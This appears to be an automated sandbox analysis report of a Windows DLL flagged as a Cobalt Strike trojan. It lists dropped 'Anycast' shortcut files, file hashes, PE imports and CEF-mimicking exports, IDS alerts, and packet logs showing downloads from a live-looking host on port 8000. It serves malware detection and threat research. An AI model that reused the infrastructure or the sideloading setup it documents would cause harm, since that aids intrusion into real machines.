                                                                                                                            Preview:L..................F.... .....&../... .{.t....&../..P............................P.O. .:i.....+00.../C:\.....................1.....lX.|..PROGRA~2.........O.IlX.|....................V......(^.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1.....lX.|..Anycast.@......lX.|lX.|....)......................9..A.n.y.c.a.s.t.....b.2.P....Wt. .Anycast.exe.H......Wt.lX.|....?.........................A.n.y.c.a.s.t...e.x.e.......Y...............-.......X............./.....C:\Program Files (x86)\Anycast\Anycast.exe..B.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.A.n.y.c.a.s.t...e.x.e.'.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.d.n.s.c.r.y.p.t.........*................@Z|...K.J.........`.......X.......302494...........hT..CrF.f4... .9.2=.b...,...W..hT..CrF.f4... .9.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Uninstall.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Mar 12 14:32:13 2024, mtime=Tue Mar 12 14:32:18 2024, atime=Tue Mar 12 14:32:13 2024, length=170992, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1113
                                                                                                                            Entropy (8bit):4.635710830274919
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8mE7/GEYbdOE4TwP9eKAvrd2GdQHyUUevqygm:8mEj5YbdOKQ5vrd2Gd4zmyg
                                                                                                                            MD5:DEC9B5B8B4587C96B9D09D2DBE549984
                                                                                                                            SHA1:C0946236E0FB75F4423DDE3AC9EFE2DFC5037C73
                                                                                                                            SHA-256:8E5461B5BEF1CE0E6A3744BB5ABD0554AA7CBF93DEC4C7C13E3B9E3EC9955DCB
                                                                                                                            SHA-512:E3FEC634E143F5D57A7160CA6428948B08F7F5067E876ECCEEB9CB5C3E3B3FACED17D374F5B05B8693A2A21AB0977C752F99DBCB206E560109392650F997BFD3
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.... ...E.t.t..L..w.t..E.t.t.........................}....P.O. .:i.....+00.../C:\.....................1.....lX.|..PROGRA~2.........O.IlX.|....................V......(^.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1.....lX.|..Anycast.@......lX.|lX.|....)......................9..A.n.y.c.a.s.t.....`.2....lX.| .uninst.exe..F......lX.|lX.|...........................9..u.n.i.n.s.t...e.x.e.......X...............-.......W............./.....C:\Program Files (x86)\Anycast\uninst.exe..A.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.u.n.i.n.s.t...e.x.e.'.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.d.n.s.c.r.y.p.t.........*................@Z|...K.J.........`.......X.......302494...........hT..CrF.f4... .(.2=.b...,...W..hT..CrF.f4... .(.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.

                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anycast\Website.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Mar 12 14:32:12 2024, mtime=Tue Mar 12 14:32:29 2024, atime=Tue Mar 12 14:32:29 2024, length=44, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1140
                                                                                                                            Entropy (8bit):4.634168911442172
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8mF3/GEYbdOE4T91zUAqndYDdQHyUUeHqygm:8mh/5YbdOZzjqnd8d4z+yg
                                                                                                                            MD5:FFFD64B1A78A90431F74E13CB7C4A8AB
                                                                                                                            SHA1:B4AF1D43930234A25D6FB5BF285CD2BC58367D9E
                                                                                                                            SHA-256:7079CF536C1EC3A7CC93D784A41FAA2704FEDA541A9F4521E005263E1BA21C94
                                                                                                                            SHA-512:035113D038275516B6964694B8DEE73F133441AD85556A272824924663A69A5200DBBBC7631C897180D17906D87CEF04B7AF91321462ECCB748CE26D660CB42E
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.... ....<tt.t....;~.t....;~.t..,............................P.O. .:i.....+00.../C:\.....................1.....lX.|..PROGRA~2.........O.IlX.|....................V......(^.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1.....lX.|..Anycast.@......lX.|lX.|....)......................9..A.n.y.c.a.s.t.....l.2.,...lX.| .ANYCAS~1.URL..P......lX.|lX.|..........................;.n.A.n.y.c.a.s.t. .V.P.N...u.r.l.......]...............-.......\............./.....C:\Program Files (x86)\Anycast\Anycast VPN.url..F.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.A.n.y.c.a.s.t. .V.P.N...u.r.l.'.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.d.n.s.c.r.y.p.t.........*................@Z|...K.J.........`.......X.......302494...........hT..CrF.f4... .=.2=.b...,...W..hT..CrF.f4... .=.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6

                                                                                                                            C:\Users\user\Desktop\Anycast.lnk

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\Public\111.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Fri Dec 15 02:19:40 2023, mtime=Tue Mar 12 14:32:29 2024, atime=Fri Dec 15 02:19:40 2023, length=1483856, window=hide
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1082
                                                                                                                            Entropy (8bit):4.642493445253289
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8mVGEYbdOE4TCYL4nAsB8dY4dQHyUUevqygm:8mV5YbdORLXsB8dXd4z2yg
                                                                                                                            MD5:8282DD2B0B1EC0072FA7D6DD4CEAB116
                                                                                                                            SHA1:6D1A7579FDAF260137DFB114E6085C7E2B65047E
                                                                                                                            SHA-256:026FFE21EC30587E1CA5E4168A0A3D2D41F3EF437EBE6005F844063C8F5741DF
                                                                                                                            SHA-512:D55824ACE11DB012999C3F4EBC4616095C22B1157F4B82219E1D5C84EBCFA7ECD9F284D09F22CC11A402E1B97F7645AF29E9BCCA95BA8EA9B951C26DF3A0199F
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.... .....&../..../~.t....&../..P............................P.O. .:i.....+00.../C:\.....................1.....lX.|..PROGRA~2.........O.IlX.|....................V......(^.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....V.1.....lX.|..Anycast.@......lX.|lX.|....)......................9..A.n.y.c.a.s.t.....b.2.P....Wt. .Anycast.exe.H......Wt.lX.|....?.........................A.n.y.c.a.s.t...e.x.e.......Y...............-.......X............./.....C:\Program Files (x86)\Anycast\Anycast.exe..0.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.A.n.y.c.a.s.t...e.x.e.'.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.A.n.y.c.a.s.t.\.d.n.s.c.r.y.p.t.........*................@Z|...K.J.........`.......X.......302494...........hT..CrF.f4... .9.2=.b...,...W..hT..CrF.f4... .9.2=.b...,...W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                            Entropy (8bit):7.456297522385349
                                                                                                                            TrID:
                                                                                                                            • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                                                                            • Win64 Executable (generic) (12005/4) 10.17%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 1.70%
                                                                                                                            • DOS Executable Generic (2002/1) 1.70%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                                                                            File name:SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll
                                                                                                                            File size:386'048 bytes
                                                                                                                            MD5:188044dbe72707df496c5f5f6fde7d96
                                                                                                                            SHA1:821939aef0a4a14520c9a3fd6b4c28839ef5e7a5
                                                                                                                            SHA256:3927c345d61acfb52e6ddf5015033023b58df5b5c638cd6e7897a1b8e5bf98e7
                                                                                                                            SHA512:a66f6ab09c9c4b678e9292826aa232037508ef1b23ca81669474a8b58e23ed4feeffe671f8f3f7e91060e3dcb724013a4ae805b60e6cf161257a52a2ff146410
                                                                                                                            SSDEEP:6144:ZRLS6xWT00aqU8FT0NyeX0efaSRv+6jMq0h5V6rHeFWoBP++SWSO:ZBS608qUqQj0eRvKV6+FWOCW
                                                                                                                            TLSH:D884F16B72D844F7E6B6427AECA30532C73174156A11DFAF03A107096F277D92C2EB62
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(...l.mLl.mLl.mL'.nMi.mL'.hM..mL'.iMf.mLy.iMb.mLy.nMf.mLy.hMH.mL'.lMo.mLl.lL..mLUFdMn.mLUFmMm.mLUF.Lm.mLUFoMm.mLRichl.mL.......

                                                                                                                            File Icon

                                                                                                                            Icon Hash:7ae282899bbab082

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x180002530
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x180000000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                                                                            Time Stamp:0x65ED62F6 [Sun Mar 10 07:36:22 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:6
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:6
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:6
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:68dd6e8a0fd18b5e7523447cb9049ee7

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [esp+08h], ebx
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [esp+10h], esi
                                                                                                                            push edi
                                                                                                                            dec eax
                                                                                                                            sub esp, 20h
                                                                                                                            dec ecx
                                                                                                                            mov edi, eax
                                                                                                                            mov ebx, edx
                                                                                                                            dec eax
                                                                                                                            mov esi, ecx
                                                                                                                            cmp edx, 01h
                                                                                                                            jne 00007F4B1CBB50E7h
                                                                                                                            call 00007F4B1CBB53C8h
                                                                                                                            dec esp
                                                                                                                            mov eax, edi
                                                                                                                            mov edx, ebx
                                                                                                                            dec eax
                                                                                                                            mov ecx, esi
                                                                                                                            dec eax
                                                                                                                            mov ebx, dword ptr [esp+30h]
                                                                                                                            dec eax
                                                                                                                            mov esi, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            add esp, 20h
                                                                                                                            pop edi
                                                                                                                            jmp 00007F4B1CBB4F74h
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            int3
                                                                                                                            inc eax
                                                                                                                            push ebx
                                                                                                                            dec eax
                                                                                                                            sub esp, 20h
                                                                                                                            dec eax
                                                                                                                            mov ebx, ecx
                                                                                                                            xor ecx, ecx
                                                                                                                            call dword ptr [00010B37h]
                                                                                                                            dec eax
                                                                                                                            mov ecx, ebx
                                                                                                                            call dword ptr [00010B26h]
                                                                                                                            call dword ptr [00010B30h]
                                                                                                                            dec eax
                                                                                                                            mov ecx, eax
                                                                                                                            mov edx, C0000409h
                                                                                                                            dec eax
                                                                                                                            add esp, 20h
                                                                                                                            pop ebx
                                                                                                                            dec eax
                                                                                                                            jmp dword ptr [00010B24h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [esp+08h], ecx
                                                                                                                            dec eax
                                                                                                                            sub esp, 38h
                                                                                                                            mov ecx, 00000017h
                                                                                                                            call dword ptr [00010B18h]
                                                                                                                            test eax, eax
                                                                                                                            je 00007F4B1CBB50E9h
                                                                                                                            mov ecx, 00000002h
                                                                                                                            int 29h
                                                                                                                            dec eax
                                                                                                                            lea ecx, dword ptr [0005C036h]
                                                                                                                            call 00007F4B1CBB52AEh
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [0005C11Dh], eax
                                                                                                                            dec eax
                                                                                                                            lea eax, dword ptr [esp+38h]
                                                                                                                            dec eax
                                                                                                                            add eax, 08h
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [0005C0ADh], eax
                                                                                                                            dec eax
                                                                                                                            mov eax, dword ptr [0005C106h]
                                                                                                                            dec eax
                                                                                                                            mov dword ptr [0005BF77h], eax

                                                                                                                            Data Directories

                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x1c9400x4a0.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x1cde00x28.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xf8.rsrc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x600000x1278.pdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000x67c.reloc
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x1ac500x70.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1ab100x140.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x130000x2a8.rdata
                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                            Sections

                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                            .text0x10000x110b00x112004fc175c8791fe3667772644feff6b36dFalse0.568359375data6.469706552313205IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                            .rdata0x130000xa6c40xa8009bcc73a6c960eb8cc947aca851b41481False0.4192010788690476data4.74567176842106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .data0x1e0000x417200x406007c8dbc2a1c316dd0910a580ab594094aFalse0.9073839502427185data7.658571096776491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                            .pdata0x600000x12780x14002938e3d091b294b160deddad96055facFalse0.4447265625data4.685971938500448IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            _RDATA0x620000x15c0x200eca7a76df68ff9322caac540c7ebc0bdFalse0.400390625data2.765916835916862IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .rsrc0x630000xf80x200a6c5fb50ca09b31bb51a1def1e0295ddFalse0.3359375data2.5249599901333757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                            .reloc0x640000x67c0x80098ad252aa750aa648c19b88dd393529fFalse0.49755859375data4.909372031048499IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                            Resources

                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                            RT_MANIFEST0x630600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                                                                                                            Imports

                                                                                                                            DLLImport
                                                                                                                            KERNEL32.dllGetCommandLineW, GetCommandLineA, GetModuleHandleA, K32GetModuleInformation, CreateFileA, CreateFileMappingW, MapViewOfFile, VirtualProtect, UnmapViewOfFile, CloseHandle, LoadLibraryA, GetProcAddress, FreeLibrary, Sleep, CreateThread, WriteFile, CreateProcessA, WaitForSingleObject, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW

                                                                                                                            Exports

                                                                                                                            NameOrdinalAddress
                                                                                                                            cef_api_hash10x180001c60
                                                                                                                            cef_execute_process20x1800011c0
                                                                                                                            cef_get_path30x1800011c0
                                                                                                                            cef_log40x1800011c0
                                                                                                                            cef_post_task50x1800011c0
                                                                                                                            cef_process_message_create60x1800011c0
                                                                                                                            cef_string_list_alloc70x1800011c0
                                                                                                                            cef_string_list_append80x1800011c0
                                                                                                                            cef_string_list_free90x1800011c0
                                                                                                                            cef_string_list_size100x1800011c0
                                                                                                                            cef_string_list_value110x1800011c0
                                                                                                                            cef_string_map_alloc120x1800011c0
                                                                                                                            cef_string_map_append130x1800011c0
                                                                                                                            cef_string_map_free140x1800011c0
                                                                                                                            cef_string_map_key150x1800011c0
                                                                                                                            cef_string_map_size160x1800011c0
                                                                                                                            cef_string_map_value170x1800011c0
                                                                                                                            cef_string_multimap_alloc180x1800011c0
                                                                                                                            cef_string_multimap_append190x1800011c0
                                                                                                                            cef_string_multimap_free200x1800011c0
                                                                                                                            cef_string_multimap_key210x1800011c0
                                                                                                                            cef_string_multimap_size220x1800011c0
                                                                                                                            cef_string_multimap_value230x1800011c0
                                                                                                                            cef_string_userfree_utf16_free240x1800011c0
                                                                                                                            cef_string_utf16_clear250x1800011c0
                                                                                                                            cef_string_utf16_cmp260x1800011c0
                                                                                                                            cef_string_utf16_set270x1800011c0
                                                                                                                            cef_string_utf16_to_utf8280x1800011c0
                                                                                                                            cef_string_utf8_clear290x1800011c0
                                                                                                                            cef_string_utf8_to_utf16300x1800011c0
                                                                                                                            cef_v8context_get_current_context310x1800011c0
                                                                                                                            cef_v8value_create_bool320x1800011c0
                                                                                                                            cef_v8value_create_function330x1800011c0
                                                                                                                            cef_v8value_create_int340x1800011c0
                                                                                                                            cef_v8value_create_string350x1800011c0

                                                                                                                            Possible Origin

                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                            EnglishUnited States

                                                                                                                            Network Behavior

                                                                                                                            Snort IDS Alerts

                                                                                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                            03/12/24-16:32:00.731418TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)497058000192.168.2.5149.28.222.244
                                                                                                                            03/12/24-16:32:00.731671TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)497068000192.168.2.5149.28.222.244
                                                                                                                            03/12/24-16:32:00.731671TCP2805877ETPRO TROJAN W32.Virut.CF exe request497068000192.168.2.5149.28.222.244
                                                                                                                            03/12/24-16:32:00.731418TCP2805877ETPRO TROJAN W32.Virut.CF exe request497058000192.168.2.5149.28.222.244

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Mar 12, 2024 16:32:00.573687077 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.574364901 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.728171110 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.728308916 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.729003906 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.729068041 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.731417894 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.731671095 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.885768890 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.885910034 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.886419058 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.886493921 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.886728048 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.886780024 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.887665033 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.887720108 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.887810946 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.887861967 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.887923002 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.887973070 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888051987 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888099909 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888114929 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888164997 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888204098 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888242960 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888251066 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888293028 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888303041 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888319016 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888364077 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888401031 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888422966 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888487101 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888498068 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888537884 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888556004 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888608932 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888736010 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888783932 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.888889074 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.888933897 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.889121056 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.889174938 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.889440060 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.889487982 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.889544964 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.889599085 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.889620066 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:00.889669895 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.895292997 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:00.895335913 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.040958881 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.040983915 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.041055918 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.041057110 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.045903921 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.045993090 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.046086073 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.046103954 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.046104908 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.046134949 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.046139002 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.046174049 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.051394939 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.051466942 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.051508904 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.051562071 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.057003975 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.057054996 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.057065010 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.057111025 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.062257051 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.062304974 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.062344074 CET800049706149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.062391996 CET497068000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.067791939 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.067848921 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.067869902 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.067914009 CET497058000192.168.2.5149.28.222.244
                                                                                                                            Mar 12, 2024 16:32:01.078699112 CET800049705149.28.222.244192.168.2.5
                                                                                                                            Mar 12, 2024 16:32:01.078768969 CET497058000192.168.2.5149.28.222.244
